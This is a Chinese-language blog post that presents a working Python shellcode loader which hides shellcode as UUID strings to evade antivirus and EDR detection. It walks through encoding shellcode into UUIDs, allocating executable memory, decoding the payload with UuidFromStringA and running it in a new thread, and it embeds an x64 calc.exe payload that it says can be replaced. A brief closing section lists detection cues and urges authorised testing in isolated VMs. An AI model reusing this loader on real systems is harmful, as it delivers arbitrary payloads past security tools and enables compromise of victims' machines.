banner
andrewji8

Being towards death

Heed not to the tree-rustling and leaf-lashing rain, Why not stroll along, whistle and sing under its rein. Lighter and better suited than horses are straw sandals and a bamboo staff, Who's afraid? A palm-leaf plaited cape provides enough to misty weather in life sustain. A thorny spring breeze sobers up the spirit, I feel a slight chill, The setting sun over the mountain offers greetings still. Looking back over the bleak passage survived, The return in time Shall not be affected by windswept rain or shine.
telegram
twitter
github

惡意代碼的隱秘世界:UUID與deepseek-v3-0324的完美結合

首先了解一下 UUID: UUID(通用唯一標識符)是一種 128 位的值,常用於軟體系統中,用以提供幾乎可以保證唯一性的引用。它通常以字符串形式表示,由十六進制數字組成,並被劃分為五個部分。由於其結構和生成方式(基於時間戳或隨機數),UUID 發生衝突的可能性極低,因此非常適合在分佈式系統中用於標識對象或記錄,尤其是在缺乏中心化唯一性管理機制的場景下。

惡意腳本,主要利用了微軟提供的一個 API 函數(), 該函數可以將 UUID 字符串轉換為二進制格式。因此,上面的一堆 UUID, 一旦解碼為原始字節,就會以 shellcode 的身份注入到內存中執行。利用這種技術的惡意軟體逃避追殺的概率極高,VT 評分僅為:2/61。

基於 UUID 的 Shellcode 加載器(Python 實現)
這段代碼模擬了攻擊者如何將 Shellcode 編碼為 UUID 格式,並在內存中加載執行。實際攻擊中,此類代碼可能用於繞過 AV/EDR 檢測。

假設我們有一段簡單的 Shellcode(如彈計算器 calc.exe 的 x64 Shellcode),可以將其分割為 16 字節的塊,並轉換為 UUID 格式:

import ctypes
import uuid

def generate_uuid_shellcode(shellcode):
    """將Shellcode轉換為UUID格式的字符串列表"""
    uuid_shellcode = []
    for i in range(0, len(shellcode), 16):
        chunk = shellcode[i:i+16]
        # 不足16字節用NOP (0x90) 填充
        if len(chunk) < 16:
            chunk += b"\x90" * (16 - len(chunk))
        uuid_str = str(uuid.UUID(bytes_le=chunk))
        uuid_shellcode.append(uuid_str)
    return uuid_shellcode

def execute_uuid_shellcode(uuid_shellcode):
    """在內存中加載並執行UUID格式的Shellcode"""
    # 分配可讀、可寫、可執行的內存 (RWX)
    rwx_page = ctypes.windll.kernel32.VirtualAlloc(
        ctypes.c_int(0),
        ctypes.c_int(len(uuid_shellcode) * 16),
        ctypes.c_int(0x1000),  # MEM_COMMIT
        ctypes.c_int(0x40)     # PAGE_EXECUTE_READWRITE
    )
    if not rwx_page:
        print("[!] VirtualAlloc 失敗!")
        return False

    # 將UUID字符串轉換回二進制並寫入內存
    ptr = rwx_page
    for u in uuid_shellcode:
        status = ctypes.windll.rpcrt4.UuidFromStringA(
            ctypes.c_char_p(u.encode()),
            ctypes.c_void_p(ptr)
        )
        if status != 0:
            print(f"[!] UuidFromStringA 失敗 (狀態: {status})")
            return False
        ptr += 16

    # 創建線程執行Shellcode
    thread_handle = ctypes.windll.kernel32.CreateThread(
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.c_void_p(rwx_page),
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.pointer(ctypes.c_int(0))
    )
    if not thread_handle:
        print("[!] CreateThread 失敗!")
        return False

    # 等待線程結束
    ctypes.windll.kernel32.WaitForSingleObject(
        ctypes.c_int(thread_handle),
        ctypes.c_int(-1)
    )
    return True

if __name__ == "__main__":
    # 示例Shellcode (x64彈計算器,需替換為實際研究用途的Shellcode)
    shellcode = (
        b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        b"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        b"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        b"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        b"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        b"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
        b"\x63\x2e\x65\x78\x65\x00"
    )

    # 生成UUID格式的Shellcode
    print("[+] 生成UUID格式的Shellcode...")
    uuid_shellcode = generate_uuid_shellcode(shellcode)
    for u in uuid_shellcode:
        print(f'"{u}",')

    # 執行Shellcode
    print("\n[+] 執行Shellcode...")
    if execute_uuid_shellcode(uuid_shellcode):
        print("[+] Shellcode執行完成!")
    else:
        print("[!] Shellcode執行失敗!")

關鍵代碼解釋#

generate_uuid_shellcode#

  • 將原始 Shellcode 按 16 字節分塊。
  • 每塊轉換為 UUID 字符串(小端字節序)。

execute_uuid_shellcode#

  1. 使用 VirtualAlloc 分配 RWX 內存。
  2. 調用 UuidFromStringA 將 UUID 還原為二進制並寫入內存。
  3. 通過 CreateThread 執行內存中的 Shellcode。

Shellcode 替換#

  • 示例中的 Shellcode 是 x64 彈計算器的 Payload,實際研究中可替換為其他合法用途的 Shellcode(如漏洞研究中的 PoC)。

防禦建議#

監控以下 API 調用:#

  • VirtualAlloc + CreateThread 組合。
  • UuidFromStringA 用於轉換長字符串。

行為檢測:#

  • 檢查進程是否頻繁分配 RWX 內存。
  • 使用 EDR 工具(如 Elastic Endpoint)捕獲內存注入行為。

測試環境:#

  • 僅在隔離的虛擬機(如 VMware + 快照)中運行此類代碼。

請始終遵守滲透測試授權和合規性要求!

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。